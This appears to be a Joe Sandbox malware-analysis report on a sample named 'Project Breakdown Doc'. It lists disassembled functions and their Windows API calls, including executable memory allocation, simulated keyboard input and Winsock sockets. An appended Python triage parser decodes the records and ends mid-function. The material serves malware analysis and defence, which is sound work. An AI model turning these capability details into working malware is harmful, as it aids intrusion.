                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00CB9009,?,00CCF910), ref: 00CB9403
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CB9415
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  • Opcode ID: 87761159e41be686cd9ffb994f9b2d094e5aacf8e90bdf0387b1f8b7b399db80
                                                  • Instruction ID: 6f2fbaa55450d57a80832f244d5a992b57922d2eca43e80dafd75a23db5b1463
                                                  • Opcode Fuzzy Hash: 87761159e41be686cd9ffb994f9b2d094e5aacf8e90bdf0387b1f8b7b399db80
                                                  • Instruction Fuzzy Hash: 6ED0C730540323CFC7208F30CA08B4ABAE6AF00341F04C83EE596C2550E770C881CA10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f752c908d2429a7a798546e200f001162267f284dedda00b9fb127b9affb4e31
                                                  • Instruction ID: a9c4d11b738a736c8a688e7079d88166b7f84e555b0b6102b05d68d14aa0721a
                                                  • Opcode Fuzzy Hash: f752c908d2429a7a798546e200f001162267f284dedda00b9fb127b9affb4e31
                                                  • Instruction Fuzzy Hash: FAC17C74A15216EFCF14CF98C888EAEB7B5FF48714B118698E815EB251D730EE81DB90
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 00CBE3D2
                                                  • CharLowerBuffW.USER32(?,?), ref: 00CBE415
                                                    • Part of subcall function 00CBDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CBDAD9
                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00CBE615
                                                  • _memmove.LIBCMT ref: 00CBE628
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                  • String ID:
                                                  • API String ID: 3659485706-0
                                                  • Opcode ID: 2cae8fd3a1a0c213d393e62a0bfe4d85b7a47127118e07cca013f5f41feedd8e
                                                  • Instruction ID: 8cec8278af64dd872772b99d0679a8826dbf74294349c94cbfdbaa2453f632ab
                                                  • Opcode Fuzzy Hash: 2cae8fd3a1a0c213d393e62a0bfe4d85b7a47127118e07cca013f5f41feedd8e
                                                  • Instruction Fuzzy Hash: DFC14B716083119FCB14DF68C4809AABBE4FF89718F14896DF8999B351D731EA46CF82
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00CB83D8
                                                  • CoUninitialize.OLE32 ref: 00CB83E3
                                                    • Part of subcall function 00C9DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C9DAC5
                                                  • VariantInit.OLEAUT32(?), ref: 00CB83EE
                                                  • VariantClear.OLEAUT32(?), ref: 00CB86BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  • Opcode ID: 71d5d84211f8ccdfff880c709e04a48646b0e46984619394009df3192845cb42
                                                  • Instruction ID: ac68d346f52fbb7c0360ddc8df519cd2b2dc62e6918b91d91a5c02e4da32524f
                                                  • Opcode Fuzzy Hash: 71d5d84211f8ccdfff880c709e04a48646b0e46984619394009df3192845cb42
                                                  • Instruction Fuzzy Hash: 9AA136752047119FDB10DF25C895B6AB7E8FF88314F148449FA9A9B3A1CB30ED08DB52
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00CD2C7C,?), ref: 00C97C32
                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00CD2C7C,?), ref: 00C97C4A
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00CCFB80,000000FF,?,00000000,00000800,00000000,?,00CD2C7C,?), ref: 00C97C6F
                                                  • _memcmp.LIBCMT ref: 00C97C90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  • Opcode ID: a47a81126703129d8ddf8be99a8f86b4fb0c94403ebd5565b2772ffe126bbb32
                                                  • Instruction ID: d24083a9c2895a918ac2f29d936e694ef20b1579bf3d17d28f530ad0d6e8af92
                                                  • Opcode Fuzzy Hash: a47a81126703129d8ddf8be99a8f86b4fb0c94403ebd5565b2772ffe126bbb32
                                                  • Instruction Fuzzy Hash: DA811771A11109EFCF04DF94C988EEEB7B9FF89315F204198E516AB250DB71AE06CB60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  • Opcode ID: f8f1bcc09899b58df0ae6c4823e8b1badc766615860eb14f03acc8d614a837d4
                                                  • Instruction ID: 737f44e8bd5c4885f62b69ff19a739538d0aa5ba50b3c1debc6cbafef2e23a4f
                                                  • Opcode Fuzzy Hash: f8f1bcc09899b58df0ae6c4823e8b1badc766615860eb14f03acc8d614a837d4
                                                  • Instruction Fuzzy Hash: C85193306183029BDF24AFA6D899B7EB3E5BF48310F20991FE556DB2D1DB709940AB11
                                                  APIs
                                                    • Part of subcall function 00C45045: _fseek.LIBCMT ref: 00C4505D
                                                    • Part of subcall function 00CA99BE: _wcscmp.LIBCMT ref: 00CA9AAE
                                                    • Part of subcall function 00CA99BE: _wcscmp.LIBCMT ref: 00CA9AC1
                                                  • _free.LIBCMT ref: 00CA992C
                                                  • _free.LIBCMT ref: 00CA9933
                                                  • _free.LIBCMT ref: 00CA999E
                                                    • Part of subcall function 00C62F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00C69C64), ref: 00C62FA9
                                                    • Part of subcall function 00C62F95: GetLastError.KERNEL32(00000000,?,00C69C64), ref: 00C62FBB
                                                  • _free.LIBCMT ref: 00CA99A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                  • String ID:
                                                  • API String ID: 1552873950-0
                                                  • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                  • Instruction ID: d0a129e4f8fd23d4eb16b8e66c41b5b88c122722bf5872911bef0931da5d7775
                                                  • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                  • Instruction Fuzzy Hash: 4A516BB1D04219AFDF249F64CC81A9EBBB9FF49304F1004AEB209A7281DB315A80DF59
                                                  APIs
                                                  • GetWindowRect.USER32(017ADF10,?), ref: 00CC9AD2
                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00CC9B05
                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00CC9B72
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientMoveRectScreen
                                                  • String ID:
                                                  • API String ID: 3880355969-0
                                                  • Opcode ID: d210e49c1882ea154fc6f89007f07c4ffc71123ab0b1efed738c091e1eb350a1
                                                  • Instruction ID: a7f3c9ff1d2e55dd8909f1a0c7f6595c7301b8fd038af69631a1e266e9384487
                                                  • Opcode Fuzzy Hash: d210e49c1882ea154fc6f89007f07c4ffc71123ab0b1efed738c091e1eb350a1
                                                  • Instruction Fuzzy Hash: 55511C35A00209AFCF24DF58D895EAE7BB6FB44720F14815DF8259B2A0D730EE51DB50
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00CB6CE4
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB6CF4
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CB6D58
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00CB6D64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                  • String ID:
                                                  • API String ID: 2214342067-0
                                                  • Opcode ID: 94aad69eadeac14ecdacff270cafe6f9b96a0aac1e54d32d2d0258745159c89d
                                                  • Instruction ID: 1bd9d707f03891599c4d2e2ffb4e89b6d54a182ae4057c255c17c506b91b97f4
                                                  • Opcode Fuzzy Hash: 94aad69eadeac14ecdacff270cafe6f9b96a0aac1e54d32d2d0258745159c89d
                                                  • Instruction Fuzzy Hash: E8419E74740210AFEB20AF24DC86F7E77E9EB48B10F448058FA599B3D2DA759D01AB91
                                                  APIs
                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00CCF910), ref: 00CB67BA
                                                  • _strlen.LIBCMT ref: 00CB67EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  • Opcode ID: 4c517a0ed46c49da54b6b3024fd0037696a723d3bb946bd67bce48000c286435
                                                  • Instruction ID: 15fd7ada8ea5906ec0bb628a0196257b727765d37eb5da4cf97d5183a25a51a3
                                                  • Opcode Fuzzy Hash: 4c517a0ed46c49da54b6b3024fd0037696a723d3bb946bd67bce48000c286435
                                                  • Instruction Fuzzy Hash: 2141A271A00104ABCB14EBA5DCC5FEEB3A9EF48310F148169F8169B2D2DF34AE05EB50
                                                  APIs
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CABB09
                                                  • GetLastError.KERNEL32(?,00000000), ref: 00CABB2F
                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CABB54
                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CABB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                  • String ID:
                                                  • API String ID: 3321077145-0
                                                  • Opcode ID: 84ee6d50fb7a69bf9b3baf2816fe20fde197f999bb96daaac994acff2ab81875
                                                  • Instruction ID: e608f6ce379e77a626cad6bd76c9a4bafc2d751867fd5aa71b6c7b8b7e20e099
                                                  • Opcode Fuzzy Hash: 84ee6d50fb7a69bf9b3baf2816fe20fde197f999bb96daaac994acff2ab81875
                                                  • Instruction Fuzzy Hash: 4F412639600621DFCB10EF15C584A5EBBE1FF99324B098498E84A9B762CB34FD01EB91
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CC8B4D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: a9bcbc29b5cd9e49fba4337e7b341700fd04f94d0653b1204f44e8ccf828ea18
                                                  • Instruction ID: a6d603a75979495bd9bd6f2d53f3f4a08ce7c6c9b083875296c3b58f53bbfd07
                                                  • Opcode Fuzzy Hash: a9bcbc29b5cd9e49fba4337e7b341700fd04f94d0653b1204f44e8ccf828ea18
                                                  • Instruction Fuzzy Hash: EB3181B4600208BFEF209B18CCA5FAB77A5EB05310F64455EFA65D72E1CE30AE589661
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 00CCAE1A
                                                  • GetWindowRect.USER32(?,?), ref: 00CCAE90
                                                  • PtInRect.USER32(?,?,00CCC304), ref: 00CCAEA0
                                                  • MessageBeep.USER32(00000000), ref: 00CCAF11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: 7e4339c98bf145a7b5d8b57e786edc77d7e0f0420ecefc96333e2d4c686371bb
                                                  • Instruction ID: 7dbf014a136073950c88f1cb072fb5f8eb195847dd563287d62d609ab16f45c3
                                                  • Opcode Fuzzy Hash: 7e4339c98bf145a7b5d8b57e786edc77d7e0f0420ecefc96333e2d4c686371bb
                                                  • Instruction Fuzzy Hash: 2E416970A002199FCB11CF99C888FA9BBF5FB48344F1481ADE818CB351D730E952DBA2
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CA1037
                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CA1053
                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00CA10B9
                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00CA110B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: ad296a44e7b908bfa5ceed6e2b020f34bf17ae3c8db76bfd566cc2d7710be599
                                                  • Instruction ID: 29f775499ef9cc25a9194812058bde40552ff8301d19b2032f44967611d2deee
                                                  • Opcode Fuzzy Hash: ad296a44e7b908bfa5ceed6e2b020f34bf17ae3c8db76bfd566cc2d7710be599
                                                  • Instruction Fuzzy Hash: D9314B30E4469AAEFB308B66CC05BFDBBA9AB46318F1C421AE9A0521D1C3758EC19751
                                                  APIs
                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00CA1176
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CA1192
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00CA11F1
                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00CA1243
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 250abf352bf9e8937409d27c79923eec3e56093f3966e139c0b639d9be64558a
                                                  • Instruction ID: 46dfc4731836238fe0732d2f60e832ce9046bf2ec5b120f985306a9c1f23330b
                                                  • Opcode Fuzzy Hash: 250abf352bf9e8937409d27c79923eec3e56093f3966e139c0b639d9be64558a
                                                  • Instruction Fuzzy Hash: 20310930A406195EFF208B65C804BFE7BBAAB4A318F1C431BEAA1921D1C3348A559751
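The two WSOCK32 records above (socket / WSAGetLastError / #21, and #16 / _strlen) and the two GetKeyboardState / PostMessageW / SendInput records show why this listing is easier to triage with a small parser than by eye: a call through WSOCK32's ordinal-only import is printed as "#N", and every argument is a raw hex literal. Resolving the ordinals gives #21 = setsockopt and #16 = recv, and decoding the literals turns socket(00000002,00000002,00000011) followed by setsockopt(?,0000FFFF,00000020,...) into socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) plus setsockopt(SOL_SOCKET, SO_BROADCAST), i.e. a UDP socket with broadcast enabled. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses records in this page's "APIs" format (a few of the records above are embedded as constructed sample input), resolves WSOCK32 ordinals from the standard Winsock 1.1 export table (assumed), decodes socket()/setsockopt() arguments, and attaches coarse capability tags. The tag names and the subset of ordinals and constants are this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Joe Sandbox prints a call through an ordinal-only import as "#N.MODULE".
# WSOCK32.DLL export ordinals (the standard Winsock 1.1 table is assumed).
WSOCK32_ORDINALS = {
    1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 16: "recv",
    17: "recvfrom", 19: "send", 20: "sendto", 21: "setsockopt", 23: "socket",
}
# Winsock constants for decoding the literal arguments shown in the records.
ADDRESS_FAMILY = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTOCOL = {0: "default", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
SOL_SOCKET = 0xFFFF
SOL_SOCKET_OPTS = {0x4: "SO_REUSEADDR", 0x20: "SO_BROADCAST", 0x80: "SO_LINGER"}

# One "• name.MODULE(args), ref: ADDR" line; subcall prefix and "(args)" optional.
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[#\w:]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

@dataclass
class Call:
    name: str                  # export name, ordinal resolved where known
    module: str
    args: List[Optional[int]]  # hex literals as ints, "?" (unknown) as None
    ref: str                   # call-site address in the dump
    subcall_of: Optional[str] = None  # set for "Part of subcall function" lines

def resolve_name(raw: str, module: str) -> str:
    if raw.startswith("#") and module == "WSOCK32":
        return WSOCK32_ORDINALS.get(int(raw[1:]), raw)
    return raw

def parse_args(text: Optional[str]) -> List[Optional[int]]:
    out = []
    for tok in (text or "").split(","):
        tok = tok.strip()
        if tok:
            out.append(int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]+", tok) else None)
    return out

def parse_records(text: str) -> List[List[Call]]:
    """Split the listing at each 'APIs' heading; one list of calls per function."""
    records: List[List[Call]] = []
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            records.append([])
            continue
        m = CALL_RE.search(s)
        if m and records:
            records[-1].append(Call(resolve_name(m["name"], m["module"]), m["module"],
                                    parse_args(m["args"]), m["ref"], m["sub"]))
    return records

def _lbl(table, v):
    return "?" if v is None else table.get(v, hex(v))

def decode_winsock(call: Call) -> Optional[str]:
    """Readable form of a socket()/setsockopt() call, None for anything else."""
    a = call.args
    if call.name == "socket" and len(a) >= 3:
        return (f"socket({_lbl(ADDRESS_FAMILY, a[0])}, "
                f"{_lbl(SOCKET_TYPE, a[1])}, {_lbl(PROTOCOL, a[2])})")
    if call.name == "setsockopt" and len(a) >= 3 and a[1] == SOL_SOCKET:
        return f"setsockopt(SOL_SOCKET, {_lbl(SOL_SOCKET_OPTS, a[2])})"
    return None

def capability_tags(rec: List[Call]) -> Set[str]:
    """Coarse capability labels derived only from the record's own API set."""
    names = {c.name for c in rec}
    decoded = [d for d in map(decode_winsock, rec) if d]
    tags = set()
    if any("SOCK_DGRAM" in d for d in decoded) and any("SO_BROADCAST" in d for d in decoded):
        tags.add("udp-broadcast-socket")
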